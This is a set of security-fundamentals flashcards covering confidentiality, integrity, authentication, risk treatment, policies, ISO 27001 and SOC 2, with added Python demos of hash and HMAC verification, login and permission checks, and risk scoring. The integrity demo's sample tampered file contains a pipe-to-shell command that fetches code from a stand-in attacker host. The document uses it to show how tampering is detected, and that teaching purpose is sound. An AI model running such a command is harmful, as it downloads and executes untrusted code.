What does “Confidentiality” mean?
Ensures that sensitive data is only accessible to authorized people, systems, or processes.
What is the purpose of Confidentiality?
To prevent unauthorized access: stopping unauthorized users from seeing or stealing private information. (Protection against altering data is the job of Integrity, not Confidentiality.)
How is Confidentiality maintained?
Through encryption, access controls, passwords, and data masking.
Give examples of Confidentiality measures.
Encryption (protects files or emails)
Access Control (restricts sensitive data)
Data Masking (hides sensitive parts)
Two-Factor Authentication
NDAs (Non-Disclosure Agreements)
What does “Integrity” ensure?
That information remains accurate, unaltered, and protected from unauthorized modification.
What is the purpose of Integrity?
Protection from tampering or unauthorized data alteration.
What methods verify Integrity?
Checksums, cryptographic hash functions (e.g., SHA-256), message authentication codes (e.g., HMAC), and digital signatures. A bare checksum or hash only catches accidental corruption or unsophisticated tampering: if an attacker can replace both the data and its published hash, only a keyed MAC or a digital signature still detects the change.
Give examples of Integrity measures.
Digital signatures on emails
Database access control
Checksums verifying software downloads
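As an added example (not part of the original flashcards) of the integrity checks above, the following Python script verifies a constructed sample "download" against a published SHA-256 digest, then shows the caveat a practitioner cares about: a bare hash is defeated when the attacker controls both the file and the digest, whereas a keyed tag is not. The HMAC here stands in for a digital signature (a real publisher would use a signature scheme such as Ed25519 or GPG, so that no shared secret is needed); the artifact bytes and the key are constructed for the demo.

```python
import hashlib
import hmac

# Constructed sample artifact standing in for a downloaded installer script.
ORIGINAL = b"installer v1.2.0\n#!/bin/sh\necho install\n"
TAMPERED = b"installer v1.2.0\n#!/bin/sh\ncurl http://evil.example | sh\n"


def sha256_hex(data: bytes) -> str:
    """Plain cryptographic hash, as typically published next to a download."""
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison so the check itself leaks no timing information."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def sign_hmac(data: bytes, key: bytes) -> str:
    """Keyed digest used here as a stand-in for a digital signature:
    only the holder of `key` can produce a tag that verifies."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_hmac(data: bytes, key: bytes, tag: str) -> bool:
    return hmac.compare_digest(sign_hmac(data, key), tag)


def demo() -> dict:
    """Run the four scenarios and return which checks behaved as expected."""
    publisher_key = b"constructed-demo-key-do-not-reuse"   # assumption: demo only
    published_digest = sha256_hex(ORIGINAL)
    published_tag = sign_hmac(ORIGINAL, publisher_key)

    return {
        # 1. Corruption or simple tampering: the published hash no longer matches.
        "hash_detects_tamper": not verify_checksum(TAMPERED, published_digest),
        # 2. Attacker replaces the file AND the hash on the same download page:
        #    the bare hash check passes, because it only proves self-consistency.
        "hash_fooled_when_attacker_controls_both":
            verify_checksum(TAMPERED, sha256_hex(TAMPERED)),
        # 3. Without the publisher's key, any tag the attacker publishes fails.
        "hmac_rejects_forged_tag":
            not verify_hmac(TAMPERED, publisher_key, sign_hmac(TAMPERED, b"attacker-guess")),
        # 4. The genuine artifact with the genuine tag still verifies.
        "hmac_accepts_genuine": verify_hmac(ORIGINAL, publisher_key, published_tag),
    }


if __name__ == "__main__":
    for scenario, ok in demo().items():
        print(f"{scenario}: {'as expected' if ok else 'UNEXPECTED'}")
```

The second scenario is why download pages that host the file and its `.sha256` side by side give little protection against a compromised server or mirror; the hash should come over a separate trusted channel or be covered by a signature whose public key the verifier already trusts.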
What does “Availability” ensure?
That systems, data, and resources are accessible to authorized users whenever needed.
What is the purpose of Availability?
Minimizing downtime and ensuring continuous access to resources.
What strategies ensure Availability?
Backup, redundancy, and failover systems.
What is Authentication?
The process of verifying the identity of a user, device, or system before granting access.
What are examples of Authentication?
Passwords, biometrics (fingerprint, face scan), or security tokens.
What is Authorization?
Determining what a verified user is allowed to do (access rights, actions, services).
When does Authorization occur?
After authentication.
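As an added example (not from the original flashcards) of the authentication-then-authorization sequence above, the following Python request handler first proves identity against a constructed user store (salted PBKDF2 password hashes, constant-time comparison, the same error and roughly the same work for unknown users and wrong passwords) and only then checks a role-based permission table. The users, passwords, roles and actions are constructed for the demo.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field

PBKDF2_ITERATIONS = 100_000   # assumption: kept modest so the demo runs quickly


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow password hash; the clear-text password is never stored."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


@dataclass
class User:
    name: str
    salt: bytes
    pw_hash: bytes
    roles: set = field(default_factory=set)


def make_user(name: str, password: str, roles: set) -> User:
    salt = os.urandom(16)
    return User(name, salt, hash_password(password, salt), set(roles))


# Constructed user store and authorization policy (assumptions for the demo).
USERS = {u.name: u for u in (
    make_user("alice", "correct horse battery staple", {"admin"}),
    make_user("bob", "hunter2", {"viewer"}),
)}
PERMISSIONS = {
    "read_report": {"viewer", "admin"},
    "delete_report": {"admin"},
}


class AuthError(Exception):
    """Authentication failed: identity could not be verified."""


class AuthzError(Exception):
    """Authorization failed: identity is verified but the action is not allowed."""


def authenticate(username: str, password: str) -> User:
    """Step 1: verify who the caller is.
    Unknown user and wrong password raise the same error, and a dummy hash is
    computed for unknown users so the response time does not reveal which
    usernames exist."""
    user = USERS.get(username)
    salt = user.salt if user else b"\x00" * 16
    expected = user.pw_hash if user else b"\x00" * 32
    candidate = hash_password(password, salt)
    if user is None or not hmac.compare_digest(candidate, expected):
        raise AuthError("invalid credentials")
    return user


def authorize(user: User, action: str) -> None:
    """Step 2: decide what the already-verified identity may do.
    Unknown actions have no allowed roles, so they are denied by default."""
    if not user.roles & PERMISSIONS.get(action, set()):
        raise AuthzError(f"{user.name} may not {action}")


def handle_request(username: str, password: str, action: str) -> str:
    user = authenticate(username, password)   # always before authorization
    authorize(user, action)
    return f"{action} ok for {user.name}"


if __name__ == "__main__":
    print(handle_request("alice", "correct horse battery staple", "delete_report"))
    try:
        handle_request("bob", "hunter2", "delete_report")
    except AuthzError as e:
        print("denied:", e)
```

Note that the two failures are distinguishable to the application (`AuthError` vs `AuthzError`) but should map to deliberately uninformative responses at the edge, e.g. HTTP 401 for the first and 403 for the second, without echoing which username or role was involved.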
Who is the Controller in data privacy?
The entity that determines the purpose and means of processing personal data.
What is the first step in Risk Management?
Risk Identification — finding potential threats that could impact the organization.
What is the second step in Risk Management?
Risk Assessment — evaluating likelihood and impact of each identified risk.
What is Risk Analysis?
Evaluating identified risks to determine their potential impact and likelihood.
What are the two main risk analysis methods?
Qualitative and Quantitative.
Describe Qualitative Risk Analysis.
Uses subjective judgment (low, medium, high) based on expertise and brainstorming.
What is “Likelihood”?
The probability that a risk will occur, rated on a scale such as unlikely / possible / likely in qualitative analysis, or as an expected frequency per year in quantitative analysis.
What is “Impact”?
The magnitude of damage caused by a risk (financial, reputational, operational).
What is “Risk Tolerance”?
The acceptable level of risk an organization is willing to take.
What are the four main risk treatment strategies?
Transfer, Accept, Avoid, and Mitigate.
What is Risk Transfer?
Shifting risk to a third party (e.g., insurance, outsourcing).
What is Risk Acceptance?
Acknowledging a risk and deliberately choosing not to treat it, typically because it falls within the organization's risk tolerance (low impact or low probability) or because treating it would cost more than the expected loss.
What is Risk Mitigation?
Reducing likelihood or impact via controls (e.g., firewalls, anti-malware).
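As an added example (not part of the original flashcards) tying together the risk analysis, likelihood, impact, tolerance and treatment cards above, the following Python script scores risks both ways: a qualitative likelihood x impact heat-map score, and a quantitative annualized loss expectancy (ALE = single loss expectancy x annualized rate of occurrence, a standard formula the cards do not spell out). It then picks one of the four treatment strategies by comparing the ALE with a tolerance figure, the cost of a candidate control, and an insurance premium. The four risks, their numbers and the decision rule are constructed for the demo, not taken from any real assessment.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Qualitative scales: 1 = low, 2 = medium, 3 = high.
LIKELIHOOD = {"unlikely": 1, "possible": 2, "likely": 3}
IMPACT = {"low": 1, "medium": 2, "high": 3}


def qualitative_score(likelihood: str, impact: str) -> int:
    """Heat-map score in 1..9, the usual product of the two ordinal ratings."""
    return LIKELIHOOD[likelihood] * IMPACT[impact]


@dataclass
class Risk:
    name: str
    sle: float                    # single loss expectancy: cost of one occurrence
    aro: float                    # annualized rate of occurrence: events per year
    control_cost: float = 0.0     # annual cost of the candidate mitigating control
    control_reduction: float = 0.0  # fraction of the loss the control removes, 0..1
    insurance_premium: Optional[float] = None  # annual premium if transfer is offered

    @property
    def ale(self) -> float:
        """Annualized loss expectancy before controls: the inherent risk."""
        return self.sle * self.aro

    @property
    def residual_ale(self) -> float:
        """Expected annual loss that remains after the candidate control."""
        return self.ale * (1 - self.control_reduction)


def choose_treatment(risk: Risk, tolerance: float) -> str:
    """Map the numbers onto the four strategies (constructed decision rule):
    accept within tolerance; mitigate if the control is cheaper than the loss it
    removes; otherwise transfer if insurance is cheaper than the expected loss;
    otherwise avoid the activity altogether."""
    if risk.ale <= tolerance:
        return "accept"
    saving = risk.ale - risk.residual_ale
    if risk.control_reduction > 0 and risk.control_cost < saving:
        return "mitigate"
    if risk.insurance_premium is not None and risk.insurance_premium < risk.ale:
        return "transfer"
    return "avoid"


def triage(risks: List[Risk], tolerance: float) -> Dict[str, str]:
    return {r.name: choose_treatment(r, tolerance) for r in risks}


# Constructed register (all figures are illustrative assumptions).
REGISTER = [
    Risk("ransomware on file server", sle=500_000, aro=0.2,
         control_cost=30_000, control_reduction=0.8),          # offline backups + EDR
    Risk("laptop theft", sle=5_000, aro=2.0),                   # encrypted disks already
    Risk("data centre flood", sle=2_000_000, aro=0.02,
         insurance_premium=15_000),                             # no practical control
    Risk("legacy unsupported payment system", sle=1_000_000, aro=0.5,
         control_cost=400_000, control_reduction=0.5),          # patching is uneconomic
]
TOLERANCE = 25_000   # assumption: max expected annual loss the business will carry


if __name__ == "__main__":
    print("likely/high qualitative score:", qualitative_score("likely", "high"))
    for r in REGISTER:
        print(f"{r.name}: ALE={r.ale:,.0f} residual={r.residual_ale:,.0f} "
              f"-> {choose_treatment(r, TOLERANCE)}")
```

The residual ALE is what the "residual risk" card later refers to; in practice the tolerance, control effectiveness and loss figures are the contested inputs, and the value of writing the rule down is that those assumptions become visible and reviewable rather than hidden in a judgment call.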
What is Risk Reporting?
Documenting and communicating risks, their status, and mitigation efforts to stakeholders.
Why is Risk Reporting important?
It helps decision-makers prioritize resources and actions for effective risk management.
What is Automation, and how does it relate to Third-Party Risk Management?
Using technology to carry out tasks automatically without requiring human intervention. In third-party risk management this means using tooling to collect and score vendor questionnaires, track assessments, and monitor vendors continuously instead of doing that work by hand.
Give an example of Automation
Using AI techniques such as machine learning to perform complex tasks that would otherwise require human judgment.
Types of Controls
Preventive, Deterrent, Detective, Corrective, Compensating, and Directive.
What is incident response
Incident response is a structured approach to detecting, containing, and managing the aftermath of a cybersecurity incident, with the goal of limiting damage and reducing recovery time and cost.
What is the definition of policies
Formal, high-level statements that define an organization's approach to security and set expectations for behavior and compliance.
What is the purpose of policies?
Establish clear rules and responsibilities to protect assets, ensure regulatory compliance, and mitigate risk.
What is the definition of guidelines?
High-level recommendations (advisory, not mandatory, unlike standards) that outline best practices and frameworks to follow for achieving security objectives.
What is the purpose of guidelines?
Offer direction on how policies and procedures should be implemented to maintain consistent security practices across the organization
What is the definition of procedures?
Step-by-step instructions for carrying out specific tasks to comply with standards and policies.
What are standards
Detailed mandatory rules specifying uniform methods to enforce policies
What is Inherent risk
The risk before controls are in place
What is Residual risk
The remaining risk after controls are applied
What is ISO 27001
International standard (ISO/IEC 27001) specifying the requirements for establishing, operating, and continually improving an information security management system (ISMS). Focuses on policies, risk assessment, and risk treatment.
What is SOC 2
AICPA attestation framework (an audit report, not a certification). A SOC 2 report evaluates a service organization's controls against the Trust Services Criteria: security (always required), availability, processing integrity, confidentiality, and privacy.